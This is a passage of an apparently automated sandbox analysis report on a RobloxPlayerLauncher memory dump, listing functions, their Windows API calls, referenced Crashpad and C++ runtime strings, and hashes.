              • Opcode ID: b4e794fd6d022bf337ea487d0c24a3b05121c36d7d5767445c804c8f42cfce0b
              • Instruction ID: e365d2ab4aea13766cc72ce9601284952340f86657a806b1d3aace6db5eb76ca
              • Opcode Fuzzy Hash: b4e794fd6d022bf337ea487d0c24a3b05121c36d7d5767445c804c8f42cfce0b
              • Instruction Fuzzy Hash: F5911471D00149AFEB14EFA8DD49BEE7BB6FB85344F140128E804A7393E7799944C7A2
              APIs
              • CloseHandle.KERNEL32(00000000,0CCCCCCC), ref: 008A9352
              • GetLastError.KERNEL32(Check failed: CloseHandle(handle),00A96D88,CloseHandle), ref: 008A936B
                • Part of subcall function 00740900: std::ios_base::failure::failure.LIBCPMT ref: 00740B6F
              Strings
              • Check failed: CloseHandle(handle), xrefs: 008A9366
              • ../../../util/win/scoped_handle.cc, xrefs: 008A9375
              • void __cdecl crashpad::internal::ScopedKernelHANDLECloseTraits::Free(void *), xrefs: 008A937A
              • CloseHandle, xrefs: 008A935C
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CloseErrorHandleLaststd::ios_base::failure::failure
              • String ID: ../../../util/win/scoped_handle.cc$Check failed: CloseHandle(handle)$CloseHandle$void __cdecl crashpad::internal::ScopedKernelHANDLECloseTraits::Free(void *)
              • API String ID: 2658808353-787523245
              • Opcode ID: bf547f1718dd9f5f46217c5a22ae40f39322db536bc0c1f4589ad9181bb8ff5a
              • Instruction ID: 5470446eabece95369d3cb8cbc4badf093e3ed460192054989add914cb41177c
              • Opcode Fuzzy Hash: bf547f1718dd9f5f46217c5a22ae40f39322db536bc0c1f4589ad9181bb8ff5a
              • Instruction Fuzzy Hash: C7F0BBB5B84308B6EB1077A4AD47F693518BB11745F400564FF04A61C3EB765A154191
              APIs
              • std::locale::_Init.LIBCPMT ref: 00719CE0
              • std::ios_base::failure::failure.LIBCPMT ref: 00719E62
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Initstd::ios_base::failure::failurestd::locale::_
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2160282220-1866435925
              • Opcode ID: 4f8d9aba93f9f85642ed42e0d2da241363ed0ec5ce86e9e9b9e0fb91594183f7
              • Instruction ID: a53ff4d331a9c5cb9e6b6728c6a55383ef7d5d87eebbab3045f4b22061cee428
              • Opcode Fuzzy Hash: 4f8d9aba93f9f85642ed42e0d2da241363ed0ec5ce86e9e9b9e0fb91594183f7
              • Instruction Fuzzy Hash: 58717AB4A00215CFDB10CF58C995B9ABBF4FF48300F148469E909AB386D7B9D945CFA1
              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 008BF6F4
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::ios_base::failure::failure
              • String ID: DebugForceTerminateOnRbxCrash$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2264918676-245747847
              • Opcode ID: f1be2804f1691c22022c6c7ead319f531bbd09277f333bc02df58a65ed501aab
              • Instruction ID: e2cca825bf138ce2397cfd3a09de0f63ecf0f578632e4a6364b6f5e4d4f42f4b
              • Opcode Fuzzy Hash: f1be2804f1691c22022c6c7ead319f531bbd09277f333bc02df58a65ed501aab
              • Instruction Fuzzy Hash: 4151BD75600204DFCB14CF58C940BA9B7E5FF59318F2481A9EA55DB3A2CB75ED42CB80
              APIs
              • std::locale::_Init.LIBCPMT ref: 00719F6C
              • std::ios_base::failure::failure.LIBCPMT ref: 0071A046
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Initstd::ios_base::failure::failurestd::locale::_
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2160282220-1866435925
              • Opcode ID: d5b871843206824a6d5d5fb45d80de2bd9a8a3d207d4755021b18f94f10d5d34
              • Instruction ID: fbe7c1df26045d67e4f90a1cd7177eb363c61191b6dda98b7ae2dd6fd46e2730
              • Opcode Fuzzy Hash: d5b871843206824a6d5d5fb45d80de2bd9a8a3d207d4755021b18f94f10d5d34
              • Instruction Fuzzy Hash: E05189B0A00745DFEB20CF59C598B9ABBF4BF04304F04852DE9468B781D7B9E949CB91
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 0-1866435925
              • Opcode ID: 6bcf940a42e6495bcd7605effa0bb62e48d7d756b904cbb2e7d84cf1780d1e6a
              • Instruction ID: 4f5a26ffdd05eea8a03802bc7c7f2d34bc553024949c9ff620a517839d6db658
              • Opcode Fuzzy Hash: 6bcf940a42e6495bcd7605effa0bb62e48d7d756b904cbb2e7d84cf1780d1e6a
              • Instruction Fuzzy Hash: A611E672E40A18ABDB20DA58CD47F9BB3ECAF84314F044934F911E3291E768ED018B91
              APIs
                • Part of subcall function 00A28D30: EnterCriticalSection.KERNEL32(?,008B1859,?,00000000,?,74DEE010), ref: 00A28D31
              • SetEvent.KERNEL32(?), ref: 008B0D9F
              • GetLastError.KERNEL32(SetEvent), ref: 008B0DAE
              Strings
              • ../../../util/win/exception_handler_server.cc, xrefs: 008B0DBB
              • void __stdcall crashpad::ExceptionHandlerServer::OnNonCrashDumpEvent(void *,unsigned char), xrefs: 008B0DC0
              • SetEvent, xrefs: 008B0DA9
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CriticalEnterErrorEventLastSection
              • String ID: ../../../util/win/exception_handler_server.cc$SetEvent$void __stdcall crashpad::ExceptionHandlerServer::OnNonCrashDumpEvent(void *,unsigned char)
              • API String ID: 4239446257-2426545814
              • Opcode ID: 951def90d9fce26675478aaeff9d84ac901f883a959613a15d50009d5d552fd8
              • Instruction ID: a7ca9507f91fe3ef4d24d838f0f0ab246d6d7a2d20fd3842412e4c7c70ae09e0
              • Opcode Fuzzy Hash: 951def90d9fce26675478aaeff9d84ac901f883a959613a15d50009d5d552fd8
              • Instruction Fuzzy Hash: B301C031200218BBDB00BBA9EE46F9AB725FF04704F400124FA05929A2DB76BD74CB91
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,2912923C,?,?,00000000,00A3D7C8,000000FF,?,00A140E1,00000002,?,00A140B5,00A05409), ref: 00A14143
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A14155
              • FreeLibrary.KERNEL32(00000000,?,?,00000000,00A3D7C8,000000FF,?,00A140E1,00000002,?,00A140B5,00A05409), ref: 00A14177
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: 32219f64e39d039cae0c6341bf9f8f7821ae3fd05ed12331de6c025d75b9ca61
              • Instruction ID: 9ae7b31cec19d03e35d8eac1b69eac6aef32e6d5a7a8517c8a5557f6bd46480e
              • Opcode Fuzzy Hash: 32219f64e39d039cae0c6341bf9f8f7821ae3fd05ed12331de6c025d75b9ca61
              • Instruction Fuzzy Hash: 5001D679914669FFDB128F94DC05FEEB7F8FB49B11F000625F811A22A0DBB59981CA90
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 007159A7
              • std::_Lockit::_Lockit.LIBCPMT ref: 007159C5
              • std::_Lockit::~_Lockit.LIBCPMT ref: 007159E5
              • std::_Facet_Register.LIBCPMT ref: 00715A9C
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00715AB4
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
              • String ID:
              • API String ID: 459529453-0
              • Opcode ID: a655cd1a5dd71d238e19efed489e6cfaeef6bfa2c9be03eefd7efa258dbcd38d
              • Instruction ID: ef10b5cdb0aeafae9471710cb09b8e6695705ecab08b9824deeb66b250c4fcb4
              • Opcode Fuzzy Hash: a655cd1a5dd71d238e19efed489e6cfaeef6bfa2c9be03eefd7efa258dbcd38d
              • Instruction Fuzzy Hash: C4418171A40655DFCB29CF58C4C1BAEBBA4FF84750F158259E806AB382D734AD81CBD1
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00741C37
              • std::_Lockit::_Lockit.LIBCPMT ref: 00741C55
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00741C75
              • std::_Facet_Register.LIBCPMT ref: 00741D2C
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00741D44
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
              • String ID:
              • API String ID: 459529453-0
              • Opcode ID: 3dfe1d36ed8bc667921e72a3163ffcbe92b618f1737cff5c3d0c2d2aea1b2966
              • Instruction ID: c8f19d2158f73521985917d9d32a9f2e9c990d38056fdca6a9fe82b98bf8bf5b
              • Opcode Fuzzy Hash: 3dfe1d36ed8bc667921e72a3163ffcbe92b618f1737cff5c3d0c2d2aea1b2966
              • Instruction Fuzzy Hash: 2541DF71A40254DBCB21EF58C880BAEB7B4FB44710F554169E806AB392D734ED81CFE1
              APIs
              • GetProcessHeap.KERNEL32(00000000,?,?,00771C41,?,?), ref: 0075E31F
              • HeapFree.KERNEL32(00000000,00000000,?,?,00771C41,?,?), ref: 0075E329
              • GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?,00771C41,?,?), ref: 0075E34B
              • HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00771C41,?,?), ref: 0075E352
              • GetProcessHeap.KERNEL32(?,00000000,?,?,00771C41,?,?), ref: 0075E3A9
              • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00771C41,?,?), ref: 0075E3B3
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Heap$Process$Free$Alloc
              • String ID:
              • API String ID: 3689955550-0
              • Opcode ID: 2cc85f565115aff06e0d188a9d55530b8ebbf6e0805a7d020fb43f9bb0d21c0b
              • Instruction ID: a8471228ba8122a96dc04fefa7a92203d304e440410f5066d7b5b4c5b6f27996
              • Opcode Fuzzy Hash: 2cc85f565115aff06e0d188a9d55530b8ebbf6e0805a7d020fb43f9bb0d21c0b
              • Instruction Fuzzy Hash: 6321D77A2013159BEB149FA9DC44BAAFB68FF55332F140219FD15CB2A0D7B59805CBA0
              APIs
              • GetCurrentProcessId.KERNEL32(?,?,?,?), ref: 00A28519
              • GetCurrentThreadId.KERNEL32 ref: 00A28521
              • GetLocalTime.KERNEL32(?,?,0000003A,?,0000003A), ref: 00A2856B
                • Part of subcall function 008A8610: std::ios_base::failure::failure.LIBCPMT ref: 008A874B
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Current$LocalProcessThreadTimestd::ios_base::failure::failure
              • String ID: VERBOSE
              • API String ID: 1305572937-500491588
              • Opcode ID: cb8b4a782d0663ddc1699b26442a4654f3ff5f2d8c9312d1904bb0b2727bf588
              • Instruction ID: 2c2dc8ad989c525e4f7ffa3078151f4f6541d80a8fc248355118e88e6c04fe2a
              • Opcode Fuzzy Hash: cb8b4a782d0663ddc1699b26442a4654f3ff5f2d8c9312d1904bb0b2727bf588
              • Instruction Fuzzy Hash: 9EE1F830A00214AFDF15DFA8DC49FAEB7B5EF89310F1445A8F5099B292DF359A40CB51
              APIs
              • FindResourceW.KERNEL32(00000000,?,00000006), ref: 0073948E
                • Part of subcall function 0071E0F0: GetLastError.KERNEL32(0073CD66,00B314CC,0073CD66,?,0073CD66,80004005), ref: 0071E110
                • Part of subcall function 007397A0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 007397FB
                • Part of subcall function 007397A0: VerSetConditionMask.KERNEL32(00000000), ref: 007397FF
                • Part of subcall function 007397A0: VerSetConditionMask.KERNEL32(00000000), ref: 00739803
                • Part of subcall function 007397A0: VerifyVersionInfoW.KERNEL32(?,00000023,00000000), ref: 0073982A
              • GetLastError.KERNEL32(?,00000000), ref: 007395FB
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ConditionMask$ErrorLast$FindInfoResourceVerifyVersion
              • String ID: (HRESULT 0x%8.8x)$HRESULT
              • API String ID: 3000659795-3673319160
              • Opcode ID: dffeeee4b1bde4d75f6ba6d21f4926d6e1311783a4b7ee03bb8cc8013af6daaa
              • Instruction ID: 6a81bbdce67576c61ad79dd5abb4bf7750d82ba237f2f54dbed465dcb40ceb66
              • Opcode Fuzzy Hash: dffeeee4b1bde4d75f6ba6d21f4926d6e1311783a4b7ee03bb8cc8013af6daaa
              • Instruction Fuzzy Hash: 4BC1C275A00205EBEB14DF68CC99B6EB7A5FF44314F104568FA069B3D2DBB9E910CB90
              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 00795D40
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2264918676-1866435925
              • Opcode ID: 47e66af861c44d40e93ea5e8ad9da29bfc63539944b91887bbcfa4fa0dde09c3
              • Instruction ID: 7a900bec88d3403697e24f908693a3dc6f67d4616453f130aacc2de8892613da
              • Opcode Fuzzy Hash: 47e66af861c44d40e93ea5e8ad9da29bfc63539944b91887bbcfa4fa0dde09c3
              • Instruction Fuzzy Hash: ABB1AFB4605A26DFCB12CF68D484BA9B7F1FF49314F288198E8159B352C739ED41CB90
              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 00738795
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2264918676-1866435925
              • Opcode ID: f570b3af078527c206b165d9cc41c79072c574ef11185bbbc3e691a59211a7d8
              • Instruction ID: ffce869c99e7867dcf9fe5546381167f1b152fed3d42ab42561ba53158ccebbe
              • Opcode Fuzzy Hash: f570b3af078527c206b165d9cc41c79072c574ef11185bbbc3e691a59211a7d8
              • Instruction Fuzzy Hash: 89A1B170A00608DFDB20DF58C945BAABBF5FF44304F14896DE9559B382DB7AE900CB91
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 0-1866435925
              • Opcode ID: fa0602c935d7e2d71e6a2ed50c184baec28682398ac6a327613eb10c24543848
              • Instruction ID: 4cdea1633f3bbb53e3cbcf52fab26cd96958ab26174da5d6ea9ca2889dbea85f
              • Opcode Fuzzy Hash: fa0602c935d7e2d71e6a2ed50c184baec28682398ac6a327613eb10c24543848
              • Instruction Fuzzy Hash: C191AF75A05255CFCB11CF28C480A69BBF5BF89314F294298EA159B392C739EC42CFD1
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 0-1866435925
              • Opcode ID: 53b098ba8720980d1a32e9e5bf07abcf954176ae285888ff82763205046ffd2a
              • Instruction ID: c306b97eef2e1be06b189269a7e45cbf7f471e17878d97f2faa65e6531bc97c1
              • Opcode Fuzzy Hash: 53b098ba8720980d1a32e9e5bf07abcf954176ae285888ff82763205046ffd2a
              • Instruction Fuzzy Hash: E9815874A00205DFDB15CF98C584BAABBF5BF48304F2485ADE9469B752CB7AE901CF90
              APIs
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C37
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C55
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741C75
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741D44
              • std::ios_base::failure::failure.LIBCPMT ref: 0088A4DD
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Lockitstd::_$Lockit::_Lockit::~_$std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 3570791469-1866435925
              • Opcode ID: e87cce4ea929716095108597ffa24e231f34788293354b26c54a564ae184492f
              • Instruction ID: 035189b7ee256f1a6bb4cd078ec6c991338adf0ae932b49d1ab2e8c1502540ae
              • Opcode Fuzzy Hash: e87cce4ea929716095108597ffa24e231f34788293354b26c54a564ae184492f
              • Instruction Fuzzy Hash: CE518C74A002149FEF18DF68D888A99B7F4FF48314F1580AAE905DB3A2D775ED81CB85
              APIs
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C37
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C55
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741C75
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741D44
              • std::ios_base::failure::failure.LIBCPMT ref: 0089502A
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Lockitstd::_$Lockit::_Lockit::~_$std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 3570791469-1866435925
              • Opcode ID: 7995c7bd6128c00ef1ea1322c5632605b376cd116a79e9048c9381ef681d0e02
              • Instruction ID: 457de2512dcf4d656bb849ca299ab25636b184cd8209583f31b3e1e0e4648b2f
              • Opcode Fuzzy Hash: 7995c7bd6128c00ef1ea1322c5632605b376cd116a79e9048c9381ef681d0e02
              • Instruction Fuzzy Hash: 8D518E75A002159FCB14DFA8C949EA9B7F4FF48304F1980A9E905DB362DB71ED41CB90
              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 0073F256
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2264918676-1866435925
              • Opcode ID: c2050fb1277445f2354872391cd7e1e059bb6893bc5c6b908b085bdcfb116a8f
              • Instruction ID: 61f20ee96ea7dd4ddb59112fc123807a1743b2bedf82c664fdf1b658abdbff3b
              • Opcode Fuzzy Hash: c2050fb1277445f2354872391cd7e1e059bb6893bc5c6b908b085bdcfb116a8f
              • Instruction Fuzzy Hash: 6841EE75A00208DFEB24CF88D985FAAB7B5BF58344F1481A9E9059B352C739EE40CB80
              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 0073BC5B
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2264918676-1866435925
              • Opcode ID: f5dd9b71d4de7e07180f995f8225d4c258df0d00be646443c23d3c61210c328e
              • Instruction ID: a9157deb7a2c3cf0db5d8f56394ee685fbf0cac72a7f53b3de86400b84f54c56
              • Opcode Fuzzy Hash: f5dd9b71d4de7e07180f995f8225d4c258df0d00be646443c23d3c61210c328e
              • Instruction Fuzzy Hash: 3D31EE79A002089FDB20DF98D945FA9B3F4EF48304F144568EA56AB392CB79ED00CB91
              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 00739FFE
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2264918676-1866435925
              • Opcode ID: 8c6a59366df61e59207c3dccdad569e52af42c07df359ac104988227cdc39b24
              • Instruction ID: c221153b0dd01d0586c3244c976fa56eba7c161d06273b04fa07ba556d00170b
              • Opcode Fuzzy Hash: 8c6a59366df61e59207c3dccdad569e52af42c07df359ac104988227cdc39b24
              • Instruction Fuzzy Hash: 3A21E4759006089FD724CF58C946FA9B7E8EB08328F508669F622D7792D7B9ED008BD1
              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 0072834E
                • Part of subcall function 009F7461: RaiseException.KERNEL32(E06D7363,00000001,00000003,009E35B6,009E35B6,?,009E20DC,009E35B6,00B45B84,00000000,009E35B6,00000000,015B8558,009E3588,00000006), ref: 009F74C1
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ExceptionRaisestd::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 1197455533-1866435925
              • Opcode ID: d4c44972e0335990172ed59809be9313da1abcc6d2b782f87d952967be49817d
              • Instruction ID: 351ca1a8d768e7a8a885197914c718342beae581191fda53428d0e1f698f7e25
              • Opcode Fuzzy Hash: d4c44972e0335990172ed59809be9313da1abcc6d2b782f87d952967be49817d
              • Instruction Fuzzy Hash: 82F0C872D4422C67DB50E998E846BEE739C5B54B00F044455FA059B283EE6E99418BE3
              APIs
              • WriteFile.KERNEL32(?,?,008ADA64,?,00000000), ref: 008AE303
              Strings
              • long __cdecl crashpad::internal::NativeWriteFile(void *,const void *,unsigned int), xrefs: 008AE342
              • ../../../util/file/file_io_win.cc, xrefs: 008AE33D
              • bytes_written != static_cast<DWORD>(-1), xrefs: 008AE321
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: FileWrite
              • String ID: ../../../util/file/file_io_win.cc$bytes_written != static_cast<DWORD>(-1)$long __cdecl crashpad::internal::NativeWriteFile(void *,const void *,unsigned int)
              • API String ID: 3934441357-2328876231
              • Opcode ID: 9f3de7a424edc462c897fecef652fd7518a44ce93bac9a235e8267c333f627e3
              • Instruction ID: e9e00a0303cb529198ac65d83b3020737d03e4cf939c2083e3c8089d1e288a9d
              • Opcode Fuzzy Hash: 9f3de7a424edc462c897fecef652fd7518a44ce93bac9a235e8267c333f627e3
              • Instruction Fuzzy Hash: C0012135600209FFDF20DE64ED05EAE7369FB12720F100764B924D32D0EB719F158652
              APIs
              • GetConsoleOutputCP.KERNEL32(2912923C,00000000,00000000,00000000), ref: 00A08BEA
                • Part of subcall function 00A1CF5D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00A1CECB,?,00000000,-00000008), ref: 00A1D009
              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A08E45
              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00A08E8D
              • GetLastError.KERNEL32 ref: 00A08F30
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
              • String ID:
              • API String ID: 2112829910-0
              • Opcode ID: 79543fbc6dc32f27df1ed9ad4ce2dcb4c5819c387240da3592ef039010d77661
              • Instruction ID: e8e774db4611b85e3dcc589a208e9f4dec09ae2576def9028f388afb90ffcb14
              • Opcode Fuzzy Hash: 79543fbc6dc32f27df1ed9ad4ce2dcb4c5819c387240da3592ef039010d77661
              • Instruction Fuzzy Hash: AAD18AB5D002499FCF15CFA8E8809EDBBB5FF49310F18452AE895EB381DB34A942CB54
              APIs
              • GetLastError.KERNEL32(WriteFile), ref: 008ADA85
              Strings
              • bool __cdecl crashpad::LoggingWriteFile(void *,const void *,unsigned int), xrefs: 008ADA97
              • ../../../util/file/file_io.cc, xrefs: 008ADA92
              • WriteFile, xrefs: 008ADA80
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorLast
              • String ID: ../../../util/file/file_io.cc$WriteFile$bool __cdecl crashpad::LoggingWriteFile(void *,const void *,unsigned int)
              • API String ID: 1452528299-3552440782
              • Opcode ID: a9762d00b1cabb5b3daa56d280259be37e593e87c2922a8553c7f00c07735f12
              • Instruction ID: dcc36e5a41fac3ce68e7d283348916040a783b09c38cce5b3696255f99909f03
              • Opcode Fuzzy Hash: a9762d00b1cabb5b3daa56d280259be37e593e87c2922a8553c7f00c07735f12
              • Instruction Fuzzy Hash: BC01A535A44328ABDB14DE68EC02AADB778FB42714F004465FC05E7A81EB70BE55D791
              APIs
              • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 007397FB
              • VerSetConditionMask.KERNEL32(00000000), ref: 007397FF
